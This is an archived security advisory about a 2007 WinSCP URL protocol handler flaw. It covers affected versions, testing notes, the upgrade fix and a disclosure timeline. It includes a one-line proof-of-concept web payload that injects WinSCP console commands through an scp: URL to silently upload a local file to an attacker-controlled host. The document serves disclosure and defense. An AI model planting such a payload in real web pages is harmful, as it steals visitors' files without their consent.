TUCoPS :: HP Unsorted W

TUCoPS :: HP Unsorted W :: tb12505.htm
WinSCP < 4.04 url protocol handler flaw
WinSCP < 4.04 url protocol handler flaw WinSCP < 4.04 url protocol handler flaw

-Affected products: WinSCP 4.03 and older

-Details:
By default WinSCP installs url protocol handlers for the scp:// and sftp:// protocols. 
These could be used by malicious web content to automatically upload any file from the local system to a remote server, or automatically  download files from a remote server to the local system.

Since version 3.8.2 there is a sort of protection against this, but this does not stop all forms of attack.

-PoC:
On a machine you control set up an scp-only account with the username "scp" with any password.
Place this on a website:
src='scp:password@yourhost.com:"</a> /console /command "option confirm off" "put c:\boot.ini" close exit "'/> 
This will upload a file to the server when the page is visited by a user with a vulnerable WinSCP installed.

Downloading a file from the server to any location writable by the current user also works.

-Tested on:
IE6 & IE7 works.
FF older than 2.0.0.5 works.
FF 2.0.0.5 and newer show a confirmation dialog before executing WinSCP.

-Solution
Upgrade to version 4.04 or higher from <a href="http://winscp.net/download.php">http://winscp.net/download.php</a> 

-Timeline
24-Jul-2007 Vulnerability reported to Martin Prikryl
25-07-2007 Proposed fix to Martin
31-07-2007 Response from Martin
01-09-2007 Martin confirms fix
02-09-2007 New version done
06-09-2007 WinSCP v4.04 released





</b></font></pre></tt></body></html>


<!-- google_ad_section_end -->
<p><center>

<p></center>
<center><a href="/firefox.htm">TUCoPS is optimized to look best in Firefox&reg; on a widescreen monitor (1440x900 or better).</a></center>
<font size=1><center>Site design & layout copyright &copy; 1986-2024 AOH</font>
</center>
<br><center><IMG SRC="http://artofhacking.com/cgi-bin/sc/sc.cgi?acct=tucops&font=payphone-med"></center>
<p>
</body>
</html>